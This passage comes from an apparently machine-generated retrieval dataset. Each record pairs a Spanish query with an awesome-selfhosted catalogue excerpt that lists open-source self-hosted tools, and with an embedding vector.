-0.02001, -0.00458, -0.00241, 0.0502, 0.02691, -0.01955, 0.03362, -0.01307, 0.05309, 0.00535, 0.00875, 0.04367, -0.00913, -0.02845, -0.03922, -0.01024, 0.00918, -0.00449, -0.0253, 0.05668, -0.00045, 0.07397, -0.03556, 0.01284, 0.04632, 0.03739, 0.0352, -0.0205, 0.02077, 0.02213, -0.02099, -0.04385, 0.00761, 0.04715, 0.03298, 0.02384, -0.00853, -0.09582, -0.04056, 0.02393, 0.05822, 0.02384, -0.04755, -0.04798, -0.0401, 0.00091, 0.02563, 0.00928, -0.06468, 0.01281, 0.02985, 0.04747, -0.02549, 0.02764, -0.01376]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "necesito una forma privada de guardar la lista de regalos de mi fiesta sin que nadie vea mis datos, ΒΏhay alguna soluciΓ³n libre?", "v": [-0.07996, 0.11357, -0.1037, -0.01715, -0.17483, -0.08723, -0.06274, -0.01704, -0.14726, -0.15396, -0.00558, -0.20336, 0.00155, 0.00195, -0.01, -0.05889, 0.14787, 0.07066, 0.08561, 0.04766, -0.09116, -0.01966, -0.06452, -0.12915, -0.11313, -0.08002, 0.15509, 0.02788, -0.18127, 0.15527, 0.05947, -0.08383, -0.03205, -0.09585, 0.0291, 0.10951, 0.10471, -0.04721, -0.10979, -0.06723, 0.08444, 0.04567, 0.01089, 0.06759, -0.06445, -0.1317, -0.04315, 0.06159, -0.03527, 0.00021, 0.00242, -0.07905, -0.04711, -0.06812, 0.04621, -0.07929, 0.02914, 0.02103, 0.03209, 0.04177, -0.21901, -0.00663, 0.08928, 0.03325, 0.04154, -0.0022, -0.02067, -0.06727, -0.04836, 0.01754, -0.06786, -0.01256, 0.00546, 0.00544, 0.02756, 0.00794, -0.0056, 0.03017, -0.11828, 0.1894, -0.02999, 0.02641, -0.0115, -0.03856, -0.02344, -0.07348, 0.13538, 0.04029, 0.03217, 0.00847, 0.04549, 0.00507, -0.06899, 0.0339, -0.03212, -0.00101, 0.03928, 0.08535, -0.03421, 0.08073, 0.12122, 0.02834, -0.08437, 0.01703, 0.00929, 0.02621, 0.03517, -0.02599, 0.05825, 0.04441, -0.00864, 0.03047, -0.02913, -0.07754, -0.02024, -0.00103, -0.00936, -0.02543, -0.03967, 0.09202, -0.07861, -0.06968, 0.03723, 0.00153, -0.00528, 0.00027, 0.00382, 0.14035, -0.04761, 0.09982, -0.00564, 0.01191, -0.10137, -0.0945, 0.07781, -0.01906, -0.05654, -0.06258, 0.02453, 0.00632, 0.05977, 0.01621, -0.02873, 0.01801, 0.06434, -0.03257, -0.00033, 0.03474, -0.0645, -0.03067, -0.02742, 0.0254, 0.0686, 0.04025, -0.03347, 0.02018, 0.03068, -0.08883, 0.04793, 0.02968, -0.01499, 0.02991, -0.00404, 0.03512, -0.00524, -0.04753, 0.08505, -0.0257, -0.01948, 0.05657, -0.00245, -0.01263, 0.00264, -0.10644, 0.11657, -0.05762, 0.00575, -0.09402, -0.05622, -0.04904, 0.03108, 0.057, -0.02341, 0.00383, -0.01229, -0.05519, 0.03737, -0.01934, 0.03029, -0.02041, 0.03331, -0.00134, -0.01898, -0.06041, 0.03146, -0.00793, -0.0258, -0.00456, 0.02917, -0.02058, -0.04228, 0.01573, -0.0133, 0.00689, -0.00816, -0.02631, -0.08268, 0.01365, 0.05904, -0.00098, 0.01174, -0.01337, 0.04376, -0.04695, -0.04011, -0.00115, 0.06758, 0.02618, 0.03967, -0.00188, -0.01138, 0.0849, 0.03741, -0.04318, -0.00291, 0.04304, 0.06627, 0.05255, 0.0095, 0.03128, 0.02322, 0.02759, 0.00302, -0.00751, 0.07254, -0.04787, -0.06312, -0.05682, -0.00136, 0.00715, 0.09843, 0.06476, -0.03811, -0.04553, -0.05474, -0.07642, -0.09499, 0.01342, -0.04516, -0.09184, -0.02638, -0.03963, 0.02351, -0.05302, 0.02759, -0.02243]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "que programa sirve para convertir archivos de vΓ­deo a audio?", "v": [0.00414, 0.02057, -0.025, -0.20192, -0.01145, -0.1533, -0.04018, -0.06566, 0.08753, -0.14478, -0.03291, -0.20419, -0.02927, -0.03575, -0.03466, -0.02858, 0.16041, -0.03932, 0.11925, 0.01632, 0.08479, 0.05453, -0.03037, -0.10846, 0.03161, 0.0314, 0.01102, 0.06631, -0.09101, -0.04101, -0.03685, 0.00584, 0.03914, -0.05401, -0.05379, -0.0154, 0.04681, 0.07921, -0.07521, 0.14522, -0.00172, 0.03572, -0.01301, 0.04995, -0.01559, -0.05832, 0.12398, -0.03443, -0.02457, -0.00853, 0.06413, 0.04256, -0.01477, 0.06678, 0.00151, -0.11341, -0.06782, -0.20824, -0.06672, -0.03483, 0.02104, 0.00991, 0.0388, -0.0535, -0.01829, 0.1122, 0.02026, 0.08499, -0.03423, 0.03184, -0.10396, -0.00797, 0.09763, 0.04938, -0.06932, -0.00336, -0.06401, -0.08066, -0.08332, -0.04191, 0.03442, -0.07633, 0.05864, -0.02464, -0.06059, 0.05293, 0.02603, 0.05671, 0.01432, -0.11953, -0.01825, 0.12248, 0.11652, -0.03055, 0.09055, -0.07552, 0.13767, -0.02003, -0.00185, -0.0975, 0.01922, 0.00037, -0.06622, 0.11356, 0.06539, 0.15243, 0.01188, -0.04505, -0.05693, 0.01707, 0.07492, 0.09551, -0.01728, 0.02227, -0.09297, 0.0274, -0.03103, -0.06503, 0.03876, 0.02373, -0.03709, 0.07486, -0.08229, -0.00701, -0.02655, 0.03564, -0.00879, 0.03, -0.06371, 0.12863, 0.07762, 0.00431, -0.00077, -0.05962, 0.00082, -0.11751, 0.08816, 0.06688, -0.06835, -0.02991, 0.10137, 0.07849, 0.04418, 0.01832, 0.03835, -0.06664, 0.09048, -0.04196, -0.01315, -0.03092, -0.00159, -0.03764, -0.10543, -0.11138, -0.0351, -0.00574, 0.05367, -0.11144, -0.09796, 0.01182, 0.02225, 0.01386, -0.02197, -0.08088, 0.00986, -0.05489, -0.03297, 0.06012, 0.05438, -0.0185, 0.02424, -0.02019, 0.04737, -0.09756, -0.08166, 0.03949, -0.00864, -0.05302, 0.07179, -0.05002, -0.08701, 0.03114, 0.05148, 0.06625, 0.02816, -0.02348, 0.02338, -0.00203, -0.10136, 0.03644, -0.04288, -0.02363, -0.05025, -0.00515, 0.02856, -0.07242, -0.07979, -0.03495, -0.08706, 0.02412, -0.04699, -0.04417, -0.00807, 0.01123, 0.01361, 0.05413, 0.00141, -0.03222, 0.08383, 0.05436, -0.0183, -0.00512, 0.00731, 0.03124, 0.04156, -0.00453, 0.00734, 0.12639, 0.01893, 0.05908, 0.03975, -0.01002, 0.03474, -0.0007, -0.01021, 0.03064, 0.03245, 0.0042, -0.06948, -0.0278, -0.03931, -0.02153, -0.01968, -0.02177, -0.00922, 0.00493, -0.05335, 0.03466, -0.05208, -0.06405, -0.01544, 0.06885, -0.03612, 0.01278, -0.04817, -0.00223, -0.02118, 0.01749, 0.08431, -0.02763, 0.00697, 0.04091, 0.00292, 0.0325, -0.00877, 0.04194]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "con quΓ© puedo escanear documentos desde mi mΓ³vil y enviΓ‘rselos al ordenador?", "v": [-0.10046, -0.00114, 0.04536, -0.0895, -0.04152, -0.0666, -0.06153, -0.06175, -0.07611, -0.01049, -0.13074, -0.04445, 0.05891, -0.11841, 0.08819, -0.07081, 0.14766, -0.11017, 0.05684, 0.09935, 0.06105, 0.00413, -0.09002, 0.05888, -0.00932, 0.12465, -0.09545, -0.00186, -0.08885, -0.10788, -0.02122, 0.06861, 0.01672, -0.04883, -0.10758, -0.00501, 0.05293, -0.01294, 0.02478, -0.04854, 0.08846, -0.05102, -0.10649, 0.07603, 0.0587, -0.06385, -0.028, 0.05654, -0.02915, -0.01282, -0.02817, -0.13783, -0.04788, 0.07341, -0.09207, -0.08493, 0.12627, -0.12871, 0.21272, -0.15706, -0.03571, 0.0841, -0.07581, 0.02927, 0.02971, 0.02522, 0.10264, 0.07547, -0.08783, 0.03816, -0.1101, 0.1131, 0.05818, -0.07603, 0.00978, -0.07901, -0.0706, -0.05366, 0.09212, 0.19201, 0.08879, -0.02336, -0.0772, -0.00393, -0.04372, -0.01259, 0.01238, -0.02437, 0.0678, -0.02559, 0.07212, 0.06823, -0.06634, 0.07882, -0.0405, 0.0141, 0.02627, 0.09045, -0.0932, -0.01556, 0.03599, -0.04373, -0.0812, 0.08806, -0.09052, 0.00919, -0.01565, 0.00422, -0.03044, 0.01659, 0.00788, 0.00796, 0.00484, 0.07279, -0.109, 0.02083, 0.11265, -0.0103, -0.10212, -0.03296, 0.03457, -0.02674, 0.03394, -0.00046, 0.04361, -0.04037, 0.07657, 0.12229, -0.02159, -0.00352, 0.07993, -0.07799, -0.02375, -0.04275, -0.00401, -0.02538, -0.06778, -0.13115, -0.00479, -0.04658, 0.0257, -0.00947, -0.08294, 0.023, -0.03305, 0.11625, -0.00923, 0.02357, 0.01208, -0.12243, 0.02695, -0.00706, -0.02055, 0.0319, -0.03238, 0.08349, 0.0624, 0.01881, -0.09517, -0.00827, -0.06712, 0.03801, 0.01697, 0.03866, -0.02993, -0.06133, -0.07986, -0.02764, 0.05506, 0.01338, -0.04917, 0.00995, 0.03389, -0.12275, 0.07158, -0.01193, 0.04766, 0.05468, -0.04607, 0.00639, -0.04625, 0.11151, 0.02623, 0.0101, -0.02885, 0.00015, 0.0147, -0.04744, 0.00895, -0.02483, 0.00521, 0.0786, 0.05296, -0.00088, 0.00707, -0.05887, -0.04904, -0.00167, 0.04761, -0.01016, -0.0729, -0.00679, -0.05868, 0.0113, 0.07436, 0.03957, -0.07198, -0.05784, 0.00108, 0.03474, -0.07032, -0.01542, 0.04966, 0.01369, -0.07108, -0.03741, 0.04385, 0.03001, -0.01813, -0.02579, 0.10211, -0.0151, 0.0691, -0.01628, 0.04476, -0.01983, -0.00146, -0.01651, -0.01643, -0.07241, 0.01487, -0.01576, 0.01608, 0.01227, -0.03812, 0.03831, 0.04639, -0.01779, -0.0406, 0.03658, -0.01186, 0.06748, -0.01837, -0.06992, -0.1002, 0.00071, -0.05906, -0.01367, -0.02282, -0.00646, -0.01241, -0.01309, 0.01259, -0.0587, -0.0147, 0.00094]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "hay alguna herramienta para hacer recorridos interactivos dentro de una aplicaciΓ³n?", "v": [0.08513, 0.2195, -0.17694, -0.19771, 0.08125, -0.1261, -0.05927, 0.02505, 0.00261, -0.01416, -0.0308, -0.14215, 0.00012, 0.00716, 0.10715, 0.0434, 0.06376, -0.02548, -0.05102, 0.03239, -0.10881, 0.11647, -0.19717, 0.03049, -0.12374, 0.01855, -0.02187, -0.03158, -0.13957, -0.03211, -0.01564, 0.08948, 0.05235, -0.09274, -0.15899, -0.1758, 0.03632, -0.01035, 0.00932, 0.00153, 0.01106, 0.04612, -0.11819, 0.04894, -0.00262, -0.02653, -0.02871, -0.02179, -0.10375, 0.01506, -0.01275, -0.09925, -0.09825, 0.03437, 0.01542, -0.16238, 0.15081, -0.16431, 0.02737, -0.10394, -0.05931, 0.05739, -0.0335, 0.02987, 0.00837, -0.10465, 0.09847, 0.01133, -0.06715, 0.09409, -0.02808, 0.07243, 0.0177, 0.07885, -0.03888, 0.03401, -0.00039, 0.02365, 0.02693, 0.05361, 0.04252, 0.03876, -0.03218, 0.00663, -0.07715, -0.05052, 0.09068, -0.03958, 0.07578, -0.0375, -0.06823, 0.03372, -0.02941, 0.00493, -0.02506, -0.0099, 0.01299, -0.01296, 0.07388, 0.09587, 0.13089, -0.06053, -0.11355, -0.02049, -0.06368, 0.01444, -0.04073, -0.00459, -0.09144, 0.0274, 0.10144, -0.02396, 0.01477, 0.00331, -0.00835, 0.10145, -0.03692, -0.1043, 0.02962, -0.11487, -0.04864, 0.05124, -0.12928, -0.08589, 0.04454, -0.01696, -0.05468, 0.08108, -0.03769, -0.03539, 0.03355, -0.07892, -0.11461, -0.00801, -0.03158, -0.01379, 0.05346, -0.03016, 0.01223, -0.03851, 0.03591, 0.0004, -0.02496, -0.03587, 0.0148, 0.05181, 0.00303, 0.00386, -0.02055, 0.07718, 0.03359, -0.08958, -0.03434, 0.03168, -0.00147, -0.01878, -0.01235, -0.01669, -0.07317, 0.03756, -0.06371, -0.02603, -0.00286, 0.03164, -0.0146, -0.0904, 0.0051, -0.00733, 0.02167, 0.04368, -0.00696, 0.05265, 0.08583, -0.04247, 0.01977, -0.02979, -0.09176, 0.01715, 0.03942, -0.10556, -0.00136, -0.02161, 0.05801, -0.02135, 0.02584, -0.04226, 0.03504, -0.01975, 0.00224, 0.02702, -0.02483, 0.05586, 0.01767, -0.0208, 0.09943, 0.02699, 0.06439, -0.03259, -0.00226, -0.0147, -0.03436, -0.00193, -0.03776, -0.04317, 0.02487, 0.09462, -0.01374, 0.01414, 0.02524, 0.07054, 0.03837, 0.00453, 0.04273, 0.02488, 0.02024, -0.05004, 0.00632, 0.04734, -0.03201, 0.01588, 0.03346, -0.00619, 0.01726, 0.00483, -0.01329, 0.06616, 0.04636, -0.02132, -0.06278, -0.05027, 0.02425, -0.08256, -0.011, -0.02476, 0.06473, -0.03998, 0.02676, -0.03789, -0.06754, -0.02053, -0.05057, 0.03342, 0.06068, 0.0292, -0.05105, -0.03383, -0.00222, -0.00035, -0.04088, -0.06657, -0.0273, -0.02281, 0.05324, -0.0056, 0.0123, -0.01765]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Warracker β€” Warranty tracker that lets you monitor expiry dates, upload receipts/files, and get alerts before warranties expire [AGPL-3.0, Docker]. Wavelog β€” Webbased Logging Software for Radio Amateurs. Enhanced QSO logging, statistics and maps for your browser [MIT, PHP/Docker]. WeeWX β€” Open source software for your weather station [GPL-3.0, Python/deb]. WeTTY β€” Terminal in browser over http/https [MIT, Docker/Nodejs]. Wishlist β€” Wishlist application that you can share with your friends and family [MIT, Docker/K8S]. Yamtrack β€” Media tracker for movies, tv shows, anime, manga, video games and books [⚠, AGPL-3.0, Docker/Python]. Zero-TOTP β€” Complete, reliable, secure and zero-trust webapp based on zero-knowledge encryption to store your TOTP codes [GPL-3.0, Docker].", "indexar": "que programa puedo usar para registrar las fechas de caducidad de mis garantΓ­as y avisarme antes?", "v": [0.05236, 0.108, -0.13994, -0.12832, 0.1701, -0.00245, 0.01003, 0.02154, -0.25093, -0.05116, -0.06836, -0.1235, -0.07258, -0.05047, -0.10282, 0.07054, 0.08039, -0.03273, 0.02481, 0.09992, 0.109, -0.0616, -0.0026, -0.02583, -0.09879, -0.00285, 0.12158, -0.08245, -0.09646, 0.00043, 0.02826, 0.02445, 0.0213, -0.16127, 0.05569, 0.00856, 0.01658, 0.04318, -0.05621, 0.10328, 0.04687, 0.01573, -0.03445, -0.01109, 0.04505, -0.02667, 0.03686, 0.03476, 0.01049, -0.16354, -0.00794, -0.00752, -0.01884, 0.04799, -0.00194, 0.00505, 0.05507, -0.11157, -0.04018, -0.04174, 0.04104, 0.00944, 0.10323, 0.05503, 0.05962, -0.05452, 0.09168, -0.01963, -0.0534, 0.01473, -0.02722, -0.05699, 0.03057, -0.03361, 0.02464, -0.0247, 0.0028, -0.11824, 0.02206, -0.04093, -0.04362, 0.01168, 0.04243, 0.14862, -0.03593, 0.06475, 0.06503, -0.04432, -0.03257, -0.06684, 0.11462, 0.10109, 0.02011, 0.04571, 0.12739, -0.04964, 0.14085, 0.0244, -0.01775, -0.00689, 0.07837, 0.03023, -0.0188, 0.09733, -0.03539, 0.01399, 0.08993, -0.00538, 0.05858, 0.02928, -0.02262, 0.01087, -0.1746, -0.08326, -0.0726, 0.10659, 0.06894, -0.14282, 0.05328, -0.01579, -0.0041, 0.00076, 0.03736, -0.04635, 0.10906, 0.03374, -0.1062, 0.08965, -0.0688, 0.07996, -0.00425, 0.00947, -0.09342, -0.04612, -0.02953, -0.01891, -0.09148, 0.03328, 0.05092, 0.01293, 0.04635, 0.04883, -0.02831, 0.02128, 0.0283, -0.00952, -0.04924, -0.0973, -0.09051, 0.02133, 0.02295, 0.02146, 0.03599, 0.08551, -0.03288, 0.03436, 0.06913, -0.04696, 0.02672, -0.04417, -0.0064, 0.0057, -0.03679, -0.06434, 0.0748, -0.07435, -0.017, -0.05269, 0.02712, 0.09771, 0.05382, 0.08918, 0.04977, -0.03888, 0.02333, -0.09028, -0.06164, -0.07224, -0.00437, -0.04081, -0.0335, 0.04029, -0.00345, 0.01958, 0.004, -0.00637, -0.01448, 0.00107, 0.04153, 0.03069, 0.01913, -0.00561, 0.03417, -0.0164, -0.0406, -0.0439, -0.00066, 0.00897, 0.04097, -0.04105, -0.0567, -0.04553, -0.03461, -0.04075, 0.05909, 0.01651, -0.10632, -0.01595, 0.04921, 0.09865, 0.01328, -0.01015, 0.05662, -0.00254, -0.07698, -0.05286, 0.02094, 0.01872, -0.02413, -0.00407, 0.01067, 0.08152, 0.03685, 0.01679, -0.04086, -0.09086, 0.08236, -0.01629, 0.01677, 0.02914, -0.02665, 0.01488, 0.01196, -0.06894, 0.02232, -0.02351, 0.05009, -0.04434, -0.01788, -0.10015, -0.03561, 0.09463, -0.01582, -0.08549, -0.05441, -0.03449, -0.08166, 0.06244, 0.01856, -0.07191, 0.0083, 0.01542, 0.09343, -0.08232, 0.03624, -0.01082]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Warracker β€” Warranty tracker that lets you monitor expiry dates, upload receipts/files, and get alerts before warranties expire [AGPL-3.0, Docker]. Wavelog β€” Webbased Logging Software for Radio Amateurs. Enhanced QSO logging, statistics and maps for your browser [MIT, PHP/Docker]. WeeWX β€” Open source software for your weather station [GPL-3.0, Python/deb]. WeTTY β€” Terminal in browser over http/https [MIT, Docker/Nodejs]. Wishlist β€” Wishlist application that you can share with your friends and family [MIT, Docker/K8S]. Yamtrack β€” Media tracker for movies, tv shows, anime, manga, video games and books [⚠, AGPL-3.0, Docker/Python]. Zero-TOTP β€” Complete, reliable, secure and zero-trust webapp based on zero-knowledge encryption to store your TOTP codes [GPL-3.0, Docker].", "indexar": "cual es un software libre para que mi radioaficionado guarde los registros de sus comunicaciones en el navegador?", "v": [-0.00015, -0.0246, 0.08777, -0.22305, -0.03723, -0.16452, -0.02041, -0.02334, -0.08334, -0.14568, -0.05389, -0.19417, 0.02405, -0.0128, 0.07599, 0.01749, 0.15527, -0.01395, 0.03315, 0.01097, -0.0123, -0.0038, 0.05345, -0.10604, -0.02401, -0.05633, 0.09325, -0.01369, -0.11696, 0.04317, 0.03773, -0.04481, 0.0962, -0.01674, -0.08659, 0.03417, 0.14063, 0.11027, -0.00202, 0.02265, 0.05681, -0.16142, -0.01788, 0.0607, 0.04863, -0.0477, -0.02766, -0.01814, 0.09743, 0.02238, -0.01549, -0.03041, -0.07684, -0.02532, -0.00563, -0.08693, 0.13811, -0.06267, 0.03243, -0.07384, -0.05895, 0.11068, 0.08285, -0.00056, -0.04379, -0.09552, 0.11106, -0.0551, -0.09786, 0.0013, 0.09249, -0.02318, -0.03809, 0.0206, -0.00575, 0.10647, -0.05133, -0.01287, -0.00071, 0.06797, -0.02564, -0.02121, -0.05468, 0.03122, -0.13799, -0.01893, 0.01762, -0.07599, -0.04077, 0.03546, 0.11025, 0.08292, -0.14828, 0.10717, 0.13883, -0.10184, 0.05709, 0.01925, 0.00629, 0.05771, 0.03334, 0.03125, -0.06498, 0.07595, -0.00492, -0.02523, 0.05809, -0.09614, 0.04665, 0.00923, 0.0323, 0.02949, 0.00045, -0.05635, -0.04988, -0.00464, 0.00142, -0.12112, 0.04689, -0.08204, -0.0382, -0.02685, -0.05933, -0.03783, 0.05049, 0.0535, -0.07386, 0.05936, -0.01768, 0.01465, 0.06051, -0.12796, -0.08483, -0.06565, -0.00261, 0.0248, -0.05252, -0.01756, 0.09189, 0.07284, -0.00574, 0.00558, -0.07033, 0.05787, 0.08248, 0.03294, -0.01652, 0.00412, -0.11519, -0.06151, -0.05389, -0.04258, -0.04897, -0.00438, -0.0583, 0.09331, 0.02837, -0.03384, -0.01289, 0.05311, -0.07739, 0.04004, 0.0376, -0.01866, 0.06933, -0.05813, -0.01516, 0.06331, 0.06964, -0.02459, -0.0466, 0.01948, 0.10622, -0.15583, -0.12257, -0.03751, -0.08038, 0.01457, 0.01915, -0.05788, -0.05135, 0.02843, -0.00138, -0.00176, -0.00638, 0.00357, -0.0374, -0.07494, -0.04433, 0.01013, 0.01415, 0.02757, -0.00786, -0.04999, 0.06724, 0.01307, -0.06203, -0.05688, 0.02908, -0.02584, -0.03846, -0.03308, -0.01594, -0.0172, 0.01351, 0.0219, 0.00481, -0.0146, 0.09235, 0.08841, 0.00246, -0.02039, 0.02704, 0.01182, -0.08412, 0.04815, 0.05684, 0.00056, 0.01503, -0.02163, 0.06327, 0.00404, 0.02687, -0.0634, -0.02486, 0.00717, 0.02787, 0.02209, 0.02096, 0.03629, -0.06033, 0.01107, -0.04331, -0.00011, 0.04397, 0.0211, -0.00533, 0.0063, -0.02019, -0.04554, -0.02213, 0.12452, -0.01489, -0.03717, -0.04989, -0.06798, -0.04932, 0.03444, 0.01104, -0.0539, -0.02271, -0.00692, 0.05512, -0.05328, 0.06349, -0.0332]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Warracker β€” Warranty tracker that lets you monitor expiry dates, upload receipts/files, and get alerts before warranties expire [AGPL-3.0, Docker]. Wavelog β€” Webbased Logging Software for Radio Amateurs. Enhanced QSO logging, statistics and maps for your browser [MIT, PHP/Docker]. WeeWX β€” Open source software for your weather station [GPL-3.0, Python/deb]. WeTTY β€” Terminal in browser over http/https [MIT, Docker/Nodejs]. Wishlist β€” Wishlist application that you can share with your friends and family [MIT, Docker/K8S]. Yamtrack β€” Media tracker for movies, tv shows, anime, manga, video games and books [⚠, AGPL-3.0, Docker/Python]. Zero-TOTP β€” Complete, reliable, secure and zero-trust webapp based on zero-knowledge encryption to store your TOTP codes [GPL-3.0, Docker].", "indexar": "con que herramienta puedo tener una terminal dentro del navegador para acceder a mis servicios?", "v": [-0.0395, 0.04072, -0.19795, -0.26854, 0.00523, -0.0556, -0.08427, 0.0641, -0.02773, 0.00152, -0.18448, -0.01279, 0.04161, -0.04958, 0.05181, 0.0799, 0.06642, -0.14658, 0.13184, 0.05513, 0.00554, 0.07486, -0.04707, 0.03685, -0.01864, -0.0066, -0.0237, -0.08277, -0.16414, -0.0588, -0.03934, -0.12981, 0.09707, -0.05793, -0.09304, -0.05223, 0.03529, 0.10567, 0.01456, 0.00387, 0.00952, -0.00665, -0.04667, 0.10372, 0.03286, -0.01965, 0.00489, -0.04937, 0.03182, -4e-05, 0.01316, -0.12632, -0.20346, 0.06248, -0.04784, -0.04212, 0.18517, -0.16876, 0.06644, -0.11872, -0.04676, 0.05403, -0.04209, 0.08314, -0.00196, -0.02247, 0.0176, 0.0351, -0.03689, 0.09261, -0.00309, 0.03721, 0.03505, -0.00595, -0.0242, 0.01405, -0.04197, 0.06144, 0.12608, 0.06266, 0.06748, 0.05514, -0.11189, -0.01202, -0.06982, -0.15981, -0.01213, 0.01689, 0.07344, -0.0487, 0.12139, 0.08537, -0.05361, 0.04693, -0.10164, -0.05486, -0.00178, -0.06466, -0.04749, -0.09664, 0.12485, 0.0503, -0.07489, 0.12338, 0.00411, -0.04487, 0.0042, -0.07454, -0.02189, -0.04282, 0.06254, -0.01086, 0.03711, -0.04979, -0.04405, 0.05316, -0.07748, -0.05097, -0.05548, -0.10043, -0.0377, -0.04465, -0.08665, -0.00117, 0.03585, 0.01448, -0.02356, 0.03747, 0.04725, -0.06057, 0.04361, -0.07827, -0.04741, 0.05612, -0.00654, -0.02883, 0.02623, -0.15872, 0.05532, 0.00585, 0.02584, -0.03603, -0.03993, -0.0197, 0.06311, -0.01714, -0.05847, -0.01306, -0.0748, -0.12332, 0.02171, -0.08235, -0.02211, -0.02512, -0.07138, 0.01795, -0.01621, -0.00356, -0.06301, 0.08146, -0.08273, -0.08964, 0.00985, 0.06888, -0.03265, -0.02849, -0.03334, -0.01433, 0.08815, 0.02766, 0.0079, 0.01419, 0.07247, -0.05351, 0.02212, -0.00366, -0.06259, -0.00079, 0.0299, -0.04318, -0.00338, -0.05517, -0.05455, -0.01886, -0.04338, -0.06876, 0.00716, -0.05767, -0.01987, 0.04501, -0.00214, 0.03878, -0.02469, 0.01711, 0.08492, 0.00508, -0.03465, -0.03759, -0.02063, -0.0344, -0.02504, 0.00198, 0.0392, -0.0215, 0.02292, 0.03539, -0.02987, -0.04289, 0.03345, 0.04699, 0.00894, 0.01147, 0.05479, -0.00801, 